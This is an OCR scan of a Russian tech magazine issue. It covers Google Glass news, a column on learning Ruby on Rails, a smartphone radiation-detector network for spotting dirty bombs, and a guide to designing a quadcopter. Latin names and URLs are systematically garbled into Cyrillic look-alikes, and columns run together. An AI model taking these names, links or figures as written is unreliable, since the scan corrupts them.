для коммерческих экземпляров, ведь 
СооЧе оставила за собой право дистан- 
ционно блокировать устройства при не- 
обходимости. Тем не менее начало по- 
ложено. В своем блоге (заийк.сот/ 9/16) 
Фримен замечает, что взлом очков может 
оказаться куда более неприятной вещью, 
чем взлом мобильника или даже компью- 
тера. Хакнув очки и имея впоследствии 
удаленный доступ к ним, «злоумышленник 
сможет не только наблюдать за каждым 
вашим шагом, он будет также наблюдать 
буквально за всем, что вы смотрите, слы- 
шите и делаете», — пишет Фримен. 

Еще одна не очень радужная новость 
пришла от самой корпорации Сооде. Там 
признали, что использование очков мо- 
жет вызвать головную боль и снижение зрения. Из-за большого напряжения для глаз 
Соодче С!а$$ также не рекомендовано использовать детям младше 13 лет. В общем-то, 
эта информация неудивительна, но, пожалуй, ложка дегтя не повредит ажитации вокруг 
проекта. 

Однако самой интересной из последних новостей, наверное, можно назвать реакцию 
на Соод!е С!аз$ Эрика Шмидта — председателя совета директоров Сооде. Непродолжи- 
тельное время поносив устройство на себе, Шмидт, похоже, не пришел в восторг. Он рас- 
сказал, что не представляет ситуации, в которой С!а5$ смогли бы распространиться так 
же массово, как это случилось со смартфонами. Главным препятствием для этого Шмидт 
назвал пресловутое голосовое управление, сославшись на него как на «жуткую и стран- 
ную штуку». «Из-за необходимости громко разговаривать с очками Сооде С!а$$ будет не- 
уместен во множестве мест», — считает Шмидт. Будущее очков дополненной реальности 
Шмидт скорее видит в промышленности или на массовом рынке, но лишь в том случае, 
если С!а5$ со временем «растворятся» в обычных очках. 


Главным препят- 
ствием для распро- 
странения С1а$$ 
Шмидт назвал го- 
лосовое управление, 
сославшись на него 
как на «жуткую 

и странную 
штуку» 


Соод/е анонсировала 
уже семь программ 
для С!а$$, среди 
которых социаль- 
ные приложения 
Расероок, Тм Мег 
иТитыЫтг. А сторонние 
разработчики уже 
заявляют о желании 
создавать для С!а$$... 
порноприложения. 
Порноиндустрия, 

как всегда, на острие 
прогресса :). 
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МОЛИНЬЕ СОЗДАЕТ 
БОГОВ 


—> Игровой разработчик Питер Молинье подвел итоги 
своего социального эксперимента под названием 
СипозКу — МПаР$ пзае пе Сирбе? Загадку куба разгадал 
18-летний Брайан Хендерсон. Он выиграл... возмож- 
ность стать богом в @оди$ (влияя на игровой процесс), 
следующей игре 22Сапз. 


СУШИЛКА 
ДЛЯГАДЖЕТОВ. 
ВЫЖИВАЕМОСТЬ 80% 


—> Штуку под названием ОгуВох придумали и соби- 
раются патентовать в США. Это специальная камера 
для сушки «утопленных» гаджетов с помощью тепла, 
вакуумного насоса и света. Стоимость процедуры 
20—40 долларов; устройство уже можно встретить 

в магазинах и общественных местах. 


АТЫПОМНИШЬ 
МЕУЕВНООО? 


—> Впопулярнейший набор Зситт\М добавили 
поддержку культового квеста Тпе Меуетооч. Собрать 
эти 36 тысяч строк кода удалось в основном при по- 
мощи реверс-инжиниринга и упорства. Занимались 
этим почти три года. Увы, поддержки «того самого» 
русского перевода пока нет. 


166 рублей заномер! 


Насчасто спрашивают: «В чем преимущество подписки?» ПОДП ИСКА 


Во-первых, это выгодно. Потерявшие совесть распространи- 
6 месяцев 1710р. 


тели не стесняются продавать журнал за 300 рублей ивыше. 
Во-вторых, этоудобно. Не надо искать журнал в продаже 12 месяцев 1999 р 


и бояться проморгать момент, когда весьтиражуже раз- 
берут. В-третьих, это быстро (правда, это правило действует 
не для всех): подписчикам свежий выпуск отправляется рань- 


ше, чем он появляется на прилавках магазинов. 


СОБИРАЕМ | 
АВАДРОКОПТЕР /] 


т Эти беспилотники скоро изменят мир. 
2построить такой летательный аппарат можно уже сейчас 


Магазин подписки 
ЕАНАЕЕЕЫ 


А(р://5Пор.а!с.ги УбА Е @ О == 


74 Неааег 
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В Соде $споо! можно 
программировать прямо 
в браузере, выполняя за- 
дания курса 


УЕОРЕУ 1 


ЕЕ Е ПЕ ИИ МИЯ 


2250 


ВИА РЫБЕ + 


Ме а эсоре оп Ме туеее годе! се гесепе МАЧО пебуитьз Ве 4 гпо5е песет 
Баллеез. Нл: УсагИ пее0 ап седег АМО а Шип эссе. 
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Е. мет л “вазваон” 
Емеля “Воск, ит 
Е .Босвад “абомы ГосаеЕст“, сбмебаш Е #9 
©. Плланраг “воифя 18" 
дели  стаелея во 
+ баеаЕыа “прёшеюй в“ 


ЗАВИСШАЯ ЗАДАЧА 

Я уже давно хотел изучить Вибу оп Ва!$ на каком- 
то базовом уровне. Без конкретной цели. Ско- 
рее просто для себя, чтобы лучше понять, что же 
в нем такого особенного (в отличие от 100500 
других технологий и фреймворков), что позволя- 
ет быстро создавать и масштабировать доволь- 
но нагруженные интернет-проекты. Вторичной 
причиной стало желание попробовать новые 
подходы к обучению. Когда я учился на програм- 
миста, у нас были только книги и форумы, где 
можно спросить совета. Сейчас есть интерактив- 
ные учебники и онлайн-школы программистов, 
огромное количество скринкастов (почти мечта: 
смотреть, как программируют гуру), базы знаний 
вроде Заско\уегНом!. сот и тонны исходных кодов 
на СИНоУЬВ, где можно часами изучать исходники 
настоящих профи. Следующие несколько ночей 
(а днем банально некогда) я решил выделить 
на то, чтобы попробовать новые способы обуче- 
ния в действии. 


НОЧЬПЕРВАЯ 
Начинать учить ВРибу оп Рай$ без хотя бы мини- 
мального знания непосредственно Рибу было 
бы странным. Я уже когда-то брался за интерак- 
тивный гид гибу-апа.ога. Но как прошел его, 
так и сразу все забыл. Его создатели обещают, 
что на прохождение и усвоение синтаксиса ВРиБу 
уйдет пятнадцать минут. У меня ушло тридцать. 
Правда, с постоянным отвлечением на Т\мм(ег. 
Процесс выглядит примерно так. Тебе говорят: 
«Массивы в Аибу объявляются так, а данные 
из массивов извлекают вот так. Теперь давай 
попробуй сделать массив и извлечь из него М 
элементов. А мы проверим». Читаешь, как все 
устроено, и сразу пробуешь. ВиБу ты так, конечно, 
не выучишь. Лучше это воспринимать как супер- 
экспресс-курс, который работает. 

И все-таки сам Вибу — это очень далеко 
от фреймворка НиБу оп Ва!$. Хотелось освоить 
именно рельсы. Из нашей статьи про образова- 


КАК Я УЧИЛ 
ВОВУ ОМ ВАШ ЗАТРИ НОЧИ. 
И ТАКИ НЕ ВЫУЧИЛ 


ние онлайн я точно помнил о нашумевшем курсе 
Вай$ юг Хот Ые$ (гаЙзогготЫез.ога). Это так 
же, как и Тгу Вибу, интерактивный учебник, кото- 
рый прямо с места в карьер начинает тебя учить 
готовить рельсовые приложения. Сначала тебе 
читают мини-лекцию (на английском, но все пре- 
дельно понятно — включи субтитры) о структуре 
файлов рельсового приложения, САУО-подходе 
для работы с данными, объясняют, как реализо- 
вана модель М\УС в рельсах, и так далее. После 
каждого видео тебе предлагают выполнить за- 
дания на закрепление материала. Все кажется 
простым и понятным, курс пролетает незаметно 
за час-другой (он неболышой). Но! Почувствовал 
ли я после курса, что смогу написать рельсовое 
приложение? Увы, нет! 


НОЧЬ ВТОРАЯ 
Одна из причин, почему после Ва!$ ог ХотЫе5 
появляются некоторые базовые знания, но не по- 
является уверенности, — это виртуальная среда, 
в которой проходит обучение. С одной стороны, 
она до предела уменьшает порог входа: можно 
не заботиться об окружении. С другой стороны, 
ничего реального по ходу дела ты не создаешь — 
никакого тебе «Нео М/ойа» на выходе. И главное, 
с какой стороны подступаться к его созданию, 
непонятно. С этого момента я хотел попробовать 
Вибу оп Вай$ в деле, реально установив его в си- 
стеме (до этого можно было даже не стараться), 
и снуля создать простое приложение. 

Уже не помню как, но совершенно случайно 
я наткнулся на очень удачный курс скринкастов 
на русском языке (га!з.пазбгатз.ги). Спасибо ав- 
тору за грамотное изложение: он методично объ- 
ясняет принципы работы рельсового приложения 
в деталях, по ходу погружая тебя во все необхо- 
димые тонкости. Короче говоря, всю вторую ночь 
эксперимента я смотрел первую половину из бо- 
лее чем тридцати эпизодов этих скринкастов. 

В голове окончательно закрепилась картин- 
ка, как генерируется приложение, как работать 


КОЛОНКА 
СТЕПЫ 
ИЛЬИНА 


с рельсовой консолью, как создать модели и ми- 
грации, как обновлять модели и как валидиро- 
вать в них данные, НРЕЗТЕ-контроллеры и так 
далее. Смотря каждый из эпизодов, я сразу про- 
бовал все в действии, выстраивая полностью 
рабочее рельсовое приложение. Стало понятно, 
как в принципе устроены рельсы. 


НОЧЬТРЕТЬЯ 
На третью ночь остались последние эпизо- 
ды скринкастов, которые удалось посмотреть 
в один присест: работа с рельсами уже не ка- 
залась такой дикой. В этот момент мне кто-то 
рассказал о том, что у курса ВНа!$ Тог ХГотыез 
есть толковое и гораздо более глубокое про- 
должение. Правда, курс уже платный и хостится 
в рамках школы программирования Соае $споо! 
(мимлм.содезспоо!.сот). Отдать 25 баксов, чтобы 
получить доступ ко всем курсам школы, было 
не жалко. Это стоимость на месяц, поэтому, если 
не понравится, не забудь отменить подписку. 
Курс Вай$ юг Хотые$ 2 действительно ока- 
зался очень удачным. Правда, многое стало по- 
вторением того, что я увидел в скринкастах, — 
но это было даже отчасти приятно. Пять уровней 
и пять блоков упражнений, которые делаешь 
прямо в интерактивной консоли. К этому момен- 
ту рельсы уже казались логичными, понятными 
и пригодными к использованию. 


ЧТО ДАЛЬШЕ? 

Научился ли я делать сложные проекты? Нет. 
Но точно осознал подходы, используемые 
в рельсах, и понял их удобство. Научился бы- 
стро создавать простые приложения и в су- 
перкороткий срок наращивать его функционал 
с помощью гемов, написанных сообществом. 
Я поймал кураж и дальше с удовольствием 
учусь лучшим практикам по программам Соде 
Эспоо! (сейчас смотрю курс по юнит-тестам). 
И меня чертовски радует то, что изучать техно- 
логии стало так просто. 32 
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ЧТО ЭТОТАКОЕ 

Национальная лаборатория в Айдахо (США) раз- 
работала систему СеП!ВАВ (1.иза.д0\/114С\/Ь) — 
распределенный детектор радиоактивного 
излучения, созданный для выслеживания терро- 
ристов, которые везут грязную бомбу. 

Система СейРАБ предполагает установку 
программного детектора на Апагоа-смартфоны 
пользователей. Принцип работы системы по- 
казан на рис. 1 и 2. Утилита постоянно рабо- 
тает в фоновом режиме. Как только телефон 
зарегистрировал повышение радиации, про- 
грамма просыпается и отправляет сообщение 
в центральный штаб, оттуда ведется монито- 
ринг и управление распределенным детектором 
Се!ВАО. Операторы в штабе получают инфор- 
мацию со всех мобильных телефонов, где уста- 
новлена программа. Информация наносится 
на радиационную карту, которая обновляется 
в реальном времени (рис. 3). 


ЗАЧЕМ ЭТО НУЖНО 
Грязная бомба — это бомба из обычной взрыв- 
чатки, куда добавляют радиоактивные материа- 
лы. Взрыв не приводит к особым разрушениям, 
зато заражает большую территорию. Одна бом- 
ба среднего размера может сделать необитае- 
мым целый мегаполис, а также пригороды в ра- 
диусе нескольких десятков километров. Лучше 
всего для изготовления грязной бомбы подходит 
отработанное ядерное топливо. 

Американцы боятся, что следующий теракт 
в США совершат именно с применением гряз- 
ной бомбы. Вполне возможно, что этот страх 
имеет под собой основания: сейчас атомные 
станции начинают строить в развивающихся 
странах, таких как Иран, и в этом случае отсле- 
дить отработанное топливо может оказаться 
проблематично. 


Рис. 2. Программа 
работаетнане- 
модифицированных 
телефонах Апагоа 

и использует КМОП- 
сенсор для измере- 
ния гамма-излучения 


стрируется програм- 
мным обеспечением 


) Нч Сотовая ее". 
р ОВ 4. Собираются 
О данные насенсо- 
) 3. Телефон сообщает равамеры! 
об инциденте 
1. Радиация 5.Время 
достигает икоординаты 
смартфона 2. Сообщение реги- события отобра- 


жаются накарте 


Рис. 1. Схема работы системы Сей!ВАО 


При транспортировке грязной бомбы терро- 
ристы неизбежно будут проезжать мимо людей 
с мобильными телефонами. Если программу 
Сей!вВАО поставят себе многие граждане, то бом- 
бу удастся заблаговременно обнаружить. 


КАК ЭТО РАБОТАЕТ 
Информация собирается с фотографий, кото- 
рые делает камера смартфона. Светочувстви- 
тельный КМОП-сенсор цифровой камеры реги- 
стрирует фотоны. В то же время большинство 
радиоактивных материалов излучают высоко- 
энергетические фотоны (гамма-кванты), кото- 
рые специфическим образом искажают изобра- 
жение. Внешне это проявляется как тепловой 
шум из красных точек на фото и видео. Подоб- 
ные искажения можно выявить программно. 
Кстати, детектор гамма-излучения такого типа 
под торговой маркой СаттаР!х запатентован 
В 2005 году: см. американские патенты 7391028 
и 7737410 и ряд других зарубежных патентов. 


Сейчас в каталогах приложений есть несколь- 
ко программных гамма-детекторов и под Апаго!, 
и под Ю$. Все они работают схожим образом — 
как счетчик Гейгера. Например, есть француз- 
ская программа \М/к5епзог (млК!зепзог.1г) и та же 
СаттаРих (даттарих.сот) в бесплатной ШЩе- 
версии под Апаго!а и платной версии под 105. По- 
сле аварии на Фукусиме немецкий программист 
Рольф-Дитер Кляйн (ВоН-Пщег Кет) разработал 
программу Радюасйуку Соитег (БИ.1у/10с1ЕО), 
чтобы помочь людям в зараженных регионах. 

Новаторство системы СейВАО заключается 
в создании распределенной системы, состоя- 
щей из тысяч или миллионов мобильных теле- 
фонов. Все они будут работать как гигантский 
детектор радиации, национальная сеть защиты 
от ядерной угрозы. Особенно эффективной си- 
стема будет в крупных городах и местах с боль- 
шим скоплением народа, как, например, тури- 
стические объекты. А это как раз и есть самые 
привлекательные цели для террористов. = 


Рис. 3. Черные и цвет- 
ные отметки показы- 
вают передвижения 
человека, нателефоне 
которого установлена 
программа Се!ВАО 


Глеб Девяткин 
| тан.с: 


Денис Елданди 
еп!5(Ч9агатапе. 


Как спроектировать собственный квадрокоптер 
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ЧТО ТАКОЕ КВАДРОКОПТЕР ИДЛЯЧЕГО ЭТО НАДО 
Мультироторы, они же мультикоптеры или просто коптеры, — 
это беспилотные летательные аппараты, предназначенные 
для развлечения, съемки фото и видео с воздуха или отработки 
автоматизированных систем. 

Коптеры обычно различают по числу используемых мото- 
ров — начиная от бикоптера с двумя моторами (как бип5Мр 
из фильма «Аватар») и заканчивая октакоптером с восемью. 
На самом деле число моторов ограничено только твоей фан- 
тазией, бюджетом и возможностями полетного контроллера. 


Классическим вариантом является квадрокоптер с четырь- Кстати, листовой алю- 
мя моторами, расположенными на перекрещивающихся миний можно заменить 
лучах. Такую конфигурацию еще в 1920 году попытался со- на стеклотекстолит. 
орудить француз Этьен Омишен (Енеппе Оентиспеп), ив 1922 Его тоже можно купить 
году у него это даже получилось. По сути, это самый простой в Митино. Лучше брать 
и дешевый вариант сделать летательный аппарат, способный нефольгированный, 
без особых проблем поднимать в воздух небольшие камеры зачем нам фольга? 


вроде СоРго. Но если ты собираешься взлетать с серьезной 
фото- и видеотехникой, то стоит выбирать коптер с большим 
числом моторов — это не только увеличит грузоподъемность, 
но и добавит надежности, если в полете выйдет из строя один 
или несколько моторов. 


ТЕОРИЯ ПОЛЕТА 

В теории полета (аэродинамике) принято выделять три угла 
(или три оси вращения), которые задают ориентацию и направ- 
ление вектора движения летательного аппарата. Проще говоря, 
летательный аппарат куда-то «смотрит» и куда-то двигается. 
Причем двигаться он может не туда, куда «смотрит». Даже са- 
молеты в полете имеют какую-то составляющую «сноса», кото- 


рая уводит их от курсового направления. А вертолеты вообще Бикоптеры и конфи- 
могут летать боком. гурации снечетным 
Три эти угла принято называть крен, тангаж и рыскание. количеством винтов 
Крен — это поворот аппарата вокруг его продольной оси (оси, управляются немного 
которая проходит от носа до хвоста). Тангаж — это поворот во- по-другому. Там компен- 
круг его поперечной оси (клюет носом, задирает хвост). Рыска- сация вращения идет 
ние — поворот вокруг вертикальной оси, больше всего похожий за счет поворотного узла 
на поворот в «наземном» понимании. ссервоприводом («сер- 
В классической схеме вертолета основной винт при помо- вой»), который отклоняет 
щи автомата перекоса лопастей управляет креном и тангажем. мотор с пропеллером, 
Так как основной винт обладает ненулевым сопротивлением меняя направление воз- 
воздуха, у вертолета возникает врашающий момент, направ- душного потока. 


и 7 Г 
=@ @<@а Эо Эа 
Гу 2 2 


Основные маневры (слеванаправо): движение по прямой, крен/тангаж и рыскание 


Иллюстрация: Дмитрий Коротченко 


Несмотря на то что квадрокоптеры ] 
крайне модная тема, выбирать ком- | 
поненты для сборки своего аппарата | 
по-прежнему не так просто. Выбор 
деталей для конкретного проекта — 
это мучительный поиск оптимального 
сочетания веса, мощности и функ- 
циональности. Поэтому прежде, чем 
окунуться в мир бесчисленных интер- 
нет-магазинов и безымянных китай- 
ских производителей, давай проде- | 
лаем подготовительную работу. ыз 


15 СОУЕНЗТОВУ 


Бикоптеры и конфигурации с нечетным 


количеством винтов управляются 


немного по-другому. Там компенсация 
вращения идет за счет поворотного узла 
с сервоприводом («сервой»), который 
отклоняет мотор с пропеллером, меняя 


направление воздушного потока 


ленный в сторону, противоположную вращению винта, и, чтобы 
его скомпенсировать, у вертолета есть хвостовой винт. Изменяя 
производительность хвостового винта (оборотами или шагом), 
классический вертолет управляет своим рысканием. 

В нашем же случае все сложнее. У нас есть четыре винта, 
два из них вращаются по часовой стрелке, два — против часо- 
вой. В большинстве конфигураций используются винты с неиз- 
меняемым шагом и управлять можно только их оборотами. Если 
они все будут вращаться с одинаковой скоростью, то они ском- 
пенсируют друг друга: рыскание, крен и тангаж будут нулевыми. 

Если мы увеличим обороты одного винта, вращающегося 
по часовой стрелке, и уменышим обороты другого винта, вра- 
щающегося по часовой стрелке, то мы сохраним общий момент 
вращения и рыскание по-прежнему будет нулевым, но крен или 
тангаж (в зависимости от того, где мы сделаем ему «нос») из- 
менятся. А если мы увеличим обороты на обоих винтах, враща- 
ющихся по часовой стрелке, а на винтах, вращающихся против 
часовой стрелки, уменьшим (чтобы сохранить общую подъем- 
ную силу), то возникнет вращающий момент, который изменит 
угол рыскания. Понятное дело, что все это будем делать не мы 
сами, а бортовой компьютер, который будет принимать сигнал 
с ручек управления, добавлять поправки с акселерометра и ги- 
роскопа и крутить винтами, как ему надо. 

Для того чтобы спроектировать коптер, необходимо найти 
баланс между весом, временем полета, мощностью двигателей 
и другими характеристиками. Все это зависит от конкретных 
задач. Все хотят, чтобы коптер летал выше, быстрее и дольше, 
но в среднем время полета составляет от 10 до 20 минут в за- 
висимости от емкости аккумулятора и общего полетного веса. 
Стоит запомнить, что все характеристики связаны между собой 
и, кпримеру, увеличение емкости аккумулятора приведет куве- 
личению веса и, как следствие, к уменьшению времени полета. 
Чтобы узнать, сколько примерно твоя конструкция будет висеть 
в воздухе и сможет ли вообще оторваться от земли, существует 


РХ4 — бортовой ком- 
пьютер с полноценной 
УМХ-системой 


ШМЕО 


Полет от первого лица 
(ЕР\) очень захваты- 
вает, особенно если 
пользоваться видео- 

очками и Неа Тгаскег’ом, 
который будет повторять 

движения головы 
на подвесе ЕР\/-камеры, 
создавая ощущение, 
что находишься в кабине 
пилота. 


Оепт!свепт № 2, 
пилотируемый ква- 
дрокоптер француз- 
ского инженере Этьена 
Омишена, запущенный 
в 1922 году 
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хороший онлайн-калькулятор еса!с.сп. Но прежде чем вбивать 
в него данные, нужно сформулировать требования к будущему 
аппарату. Будешь ли ты устанавливать на аппарат камеру или 
другую технику? Насколько быстрым должен быть аппарат? 
Как далеко тебе нужно летать? Давай посмотрим на характери- 
стики различных компонентов. 


РАМА 

Основной момент, который нужно решить при выборе рамы, — 
будешь ли ты использовать готовую раму или же делать ее сам. 
С готовой рамой все проще, да и заказывать в любом случае 
придется множество деталей. При этом, учитывая цены в ки- 
тайских магазинах, самодельный вариант может оказаться до- 
роже. С другой стороны, собственную раму в случае аварии бу- 
дет проще починить. Ну и, естественно, своими руками можно 
сделать любую, даже самую сумасшедшую конструкцию. Рас- 
смотрим поподробнее самосборный вариант. 

Сделать раму можно излюбых подручных материалов (дере- 
во, алюминий, пластик итак далее). Можно подойти чуть серьез- 
нее и выпилить ее на ЧПУ-станке из плетеного карбона, причем 
можно усложнить задачу и сделать складную конструкцию. 

Самый простой вариант для любителей ПМ — пойти в ОН! 
«Леруа Мерлен» или на строительный рынок и купить квадрат- 
ную алюминиевую трубу 12 х 12, а также алюминиевый лист 
толщиной в 1,5 мм. Для того чтобы сделать раму из таких ма- 
териалов типа «четыре палки и крепеж», достаточно дрели или 
ножовки по металлу. Но нужно быть готовым к тому, что такая 
конструкция прослужит недолго. Все-таки все эти профили 
делают из очень мягкого материала (АДЗ1/АДЗЗ), при полетах 
он будет легко гнуться. 

В качестве образца для твоей рамы можно взять упрощен- 
ную заводскую раму или же найти в интернете готовый чертеж. 
Более сложные материалы (например, углепластик) можно за- 
менить на алюминий — если и получится тяжелее, то ненамно- 
го. В любом случае стоит обращать внимание на длину и симме- 
тричность лучей. Длина лучей выбирается исходя из диаметра 
используемых пропеллеров, так, чтобы после их установки 
расстояние между окружностями вращающихся винтов было 
не менее 1-2 см, и ужтем более эти окружности не должны пе- 
ресекаться. Моторы, устанавливаемые на лучах, должны быть 
равноудалены от центра рамы, где будет располагаться «мозг», 
и (в большинстве случаев) находиться на одном расстоянии 
друг от друга, образуя равносторонний многоугольник. 

При проектировании стоит учесть, что центр рамы должен 
совпадать с центром тяжести, поэтому установить аккумулятор 
сзади между лучами — плохая идея, если он не будет ском- 
пенсирован грузом спереди, например камерой. Продумай, 
на что будет приземляться твой аппарат, для новичков можно 
посоветовать приспособить что-то мягкое на «пузе» или кон- 
цах лучей, например плотный поролон или теннисные мячики. 
А также защити аккумулятор на случай неудачного приземле- 
ния, например установи его между пластинами рамы или рас- 
положи под высокими посадочными лыжами. 


МОТОРЫИ ПРОПЕЛЛЕРЫ 

Из-за вращения моторов в разные стороны приходится исполь- 
зовать разнонаправленные пропеллеры: прямого вращения 
(против часовой) и обратного вращения (по часовой). Обычно 
используются двухлопастные пропеллеры, их легче баланси- 
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мальный ток разряда в емкостях аккумулятора (С) и число яче- 
ек ($). Первые два параметра связаны между собой, и при их 
перемножении ты узнаешь, сколько тока сможет отдавать этот 
аккумулятор продолжительное время. Например, твои моторы 
потребляют 10 А каждый и их четыре штуки, а батарея имеет 
параметры 2200 мА : ч 30/40С, таким образом, коптеру требу- 
ется 4 : 10А = 40 А, а батарея может выдавать 2,2 А : 30 =66 А 
или 2,2 А - 40 = 88 А втечение 5-10 секунд, что явно будет до- 
статочно для питания аппарата. Также эти коэффициенты на- 
прямую влияют на вес аккумулятора. Внимание! Если тока бу- 
дет не хватать, то в лучшем случае батарея надуется и выйдет 
из строя, а в худшем загорится или взорвется; это же может 
произойти при коротком замыкании, повреждении или непра- 
вильных условиях хранения и зарядки, поэтому используй спе- 
циализированные зарядные устройства, аккумуляторы храни 
в специальных негорючих пакетах и летай с «пищалкой», которая 
предупредит о разрядке. Число ячеек ($) указывает на количе- 
ство ЧРо-элементов в батарее, каждый элемент выдает 3,7 В, и, 


ровать и найти магазинах, в то время как трехлопастные дадут Х например, 3$-аккумулятор будет отдавать примерно 11,1 В. Сто- 
больше тяги при меньшем диаметре винта, но доставят много Регулятор скорости, ит обращать внимание на этот параметр, так как от него зависят 
головной боли при балансировке. Плохой (дешевый и неотба- онжеЕ$С скорость оборотов моторов и тип используемых регуляторов. 
лансированный) пропеллер может развалиться в полете или Элементы батареи объединяют последовательно или па- 
вызвать сильные вибрации, которые передадутся на датчики ь раллельно. При последовательном включении увеличивается 
полетного контроллера. Это приведет к серьезным пробле- Авоти моторчик напряжение, при параллельном — емкость. Схему подключе- 
мам со стабилизацией и вызовет сильное смазывание и «желе» на 850 КУ ния элементов в батарее можно понять по ее маркировке. На- 
на видео, если ты снимаешь что-то с коптера или летаешь с ви- пример, З$1Р (или просто 3$) — это три последовательно под- 
дом от первого лица. ключенных элемента. Напряжение такой батареи будет 11,1 В. 
Улюбого пропеллераесть два основных параметра: диаметр 4$2Р — это восемь элементов, две группы, подключенных па- 
и шаг Их обозначают по-разному: 10 х 4.5, 10 х 45 или просто раллельно по четыре последовательных элемента. 
1045. Это означает, что диаметр пропеллера 10 дюймов, а его Однако моторы подключаются к батарее не напрямую, а че- 
шаг 4,5 дюйма. Чем длиннее пропеллер и больше шаг, тем боль- рез так называемые регуляторы скорости. Регуляторы скоро- 
шую тягу он сможет создавать, но при этом повысится нагрузка сти (они же «регули» или ЕЗС) управляют скоростью вращения 
на мотор и увеличится потребление тока, в результате он может моторов, заставляя твой коптер балансировать на месте или 
сильно перегреться и электроника выйдет из строя. Поэтому лететь в нужном направлении. Большинство регуляторов име- 
винты подбираются под мотор. Ну или мотор под винты, тут ГПМЕО ют встроенный стабилизатор тока на 5 В, от которого можно 
как посмотреть. Обычно на сайтах продавцов моторов можно питать электронику (в частности, «мозг»), можно использовать 
встретить информацию о рекомендуемых пропеллерах и акку- Более прочный мате- отдельный стабилизатор тока (УВЕС). Выбираются контрол- 
муляторах для выбранного мотора, а также тесты создаваемой риал — дюраль (Д16Т). леры скорости исходя из потребления мотором тока, а также 
тяги и эффективности. Существуют и пропеллеры с изменяе- Практически не гнется, возможности перепрошивки. Обычные регули довольно мед- 
мым шагом, что в теории повысит маневренность, но в реаль- достаточно пружини- лительны в плане отклика на поступающий сигнал и имеют мно- 


ности добавит сложную механику, имеющую свойство изнаши- 
ваться и ломаться с последующим дорогостоящим ремонтом. 


стый, иего применяют 
вавиации. Профили 


жество лишних настроек для коптеростроительства, поэтому их 
перепрошивают кастомными прошивками ЗитопК или ВЁНей. 


Также чем больше винт, тем больше его инерция. Если нуж- из него в ОБИ не про- Китайцы и тут подсуетились, и часто можно встретить регу- 
на маневренность, лучше выбрать винты с большим шагом или даются, но можно ляторы скорости с уже обновленной прошивкой. Не забывай, 
трехлопастные. Они при том же размере создают тягу в 1,2- поймать на Митинском что такие регули не следят за состоянием аккумулятора и могут 
1,5 раза больше. Понятно, что винты и скорость их вращения рынке натретьем этаже, разрядить его ниже 3,0 В на банку, что приведет к его порче. 
нужно подбирать так, чтобы они смогли создать тягу большую, на рынке ТВЦ «Строй» Но в то же время на обычных ЕЗС стоит переключить тип ис- 
чем вес аппарата. тоже были. пользуемого аккумулятора с МРо на ММН или отключить умень- 


И наконец, бесколлекторные моторы. У моторов есть клю- 
чевой параметр — К\. Это количество оборотов в минуту, ко- 
торые сделает мотор, на поданный вольт напряжения. Это 
не мощность мотора, это его, скажем так, «передаточное чис- 
ло». Чем меньше К\, тем меньше оборотов, но выше крутящий 
момент. Чем больше К\ при той же мощности, тем больше обо- 
ротов и ниже момент. При выборе мотора ориентируются на то, 
что в штатном режиме он будет работать при мощности 50% 
от максимальной. Не стоит думать, что чем К\/ больше — тем 
лучше, для коптеров с типичной 3$-батареей рекомендуемое 
число находится в диапазоне от 700 до 1000 КМ. 


ПИТАНИЕ И КОНТРОЛЛЕРЫ ПИТАНИЯ 


ШМЕО 


шение оборотов при разрядке источника питания (согласно 
инструкции), чтобы под конец полета внезапно не отключился 
мотор и твой беспилотник не упал. 

Моторы подключаются к регулятору скорости тремя прово- 
дами, последовательность не имеет значения, но если поме- 
нять любые два из трех проводов местами, то мотор будет вра- 
щаться в обратном направлении, что очень важно для коптеров. 

Два силовых провода, идущих от регулятора, надо под- 
ключить к батарейке. НЕ ПЕРЕПУТАЙ ПОЛЯРНОСТЬ! Вообще, 
для удобства регуляторы подключают не к самой батарейке, 


поббукто.сот — самый 
известный магазин дета- 


лей для квадрокоптеров 


Капитан подсказывает: чем больше мощность мотора, тем 
больше батарейка ему нужна. Большая батарейка — это 


не только емкость (читай, время полета), но и максимальный (=) @ 
ток, которая она отдает. Но чем больше батарейка, тем больше гсдгоирз.сот — форум, ТОР роны ву 
иее вес, что вынуждает скорректировать наши прикидки отно- на котором можно обсу- 
сительно винтов и моторов. дить свою конфигурацию 

На сегодняшний день все используют литий-полимерные с экспертами 


батарейки (МРо). Они легкие, емкие, с высоким током разряд- 
ки. Единственный минус — при отрицательных температурах 
работают плохо, но если их держать в кармане и подключать 
непосредственно перед полетом, то во время разряда они 
сами слегка разогреваются и не успевают замерзнуть. ЧРо- 
элементы вырабатывают напряжение 3,7 В. 

При выборе батареи стоит обращать внимание на три ее 
параметра: емкость, измеряемую в миллиампер-часах, макси- 


Продвинутый девяти- 
канальный пульт 
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а к так называемому Ромег Г!${ибийотп Моаце — модулю рас- 
пределения энергии. Это, в общем-то, просто плата, на которой 
припаяны силовые провода регуляторов, распаяны разветвле- 
ния для них и припаян силовой кабель, идущий к батарее. Ко- 
нечно, батарею не надо припаивать, а надо соединить через 
разъем. Ты же не хочешь перепаивать батарею каждый раз, 
как она сядет. 


БОРТОВОЙ КОМПЬЮТЕРИ СЕНСОРЫ 

Выбор полетных контроллеров для коптеров очень велик — на- 

чиная от простого и дешевого КареткИК и нескольких ореп 

зоигсе проектов под Агаито-совместимые контроллеры до до- 
рогого коммерческого О.Л \Моокопад. Если ты настоящий хакер, 
то закрытые контроллеры тебя не должны сильно интересо- 
вать, в то время как открытые проекты, да еще и основанные 
на популярной ардуинке, привлекут многих программистов. 

О возможностях любого полетного контроллера можно су- 
дить по используемым в нем датчикам: 

. гироскоп позволяет удерживать коптер под определенным 
углом и стоит во всех контроллерах; 

. акселерометр помогает определить положение коптера 
относительно земли и выравнивает его параллельно гори- 
зонту (комфортный полет); 

. барометр дает возможность удерживать аппарат на опре- 
деленной высоте. На показания этого датчика очень сильно 
влияют потоки воздуха от пропеллеров, поэтому стоит пря- 
тать его под кусок поролона или губки; 

. компаси СР$ вместе добавляюттакие функции, как удержа- 
ние курса, удержание позиции, возврат наточку старта и вы- 
полнение маршрутных заданий (автономный полет). К уста- 
новке компаса стоит подойти внимательно, так как на его 
показания сильно влияют расположенные рядом металли- 
ческие объекты или силовые провода, из-за чего «мозги» 
не смогут определить верное направление движения; 

. сонар или УЗ-дальномер используется для более точного 
удержания высоты и автономной посадки; 

. оптический сенсор от мышки используется для удержания 
позиции на малых высотах; 

. Датчики тока определяют оставшийся заряд аккумулятора 
и могут активировать функции возврата на точку старта или 
приземление. 


Сейчас существует три основных открытых проекта: 
Муни, АгаиСоркег и его портированная версия МедаРимжемСс. 
МчуНМ/! самый простой из них, для запуска требует Агаито 
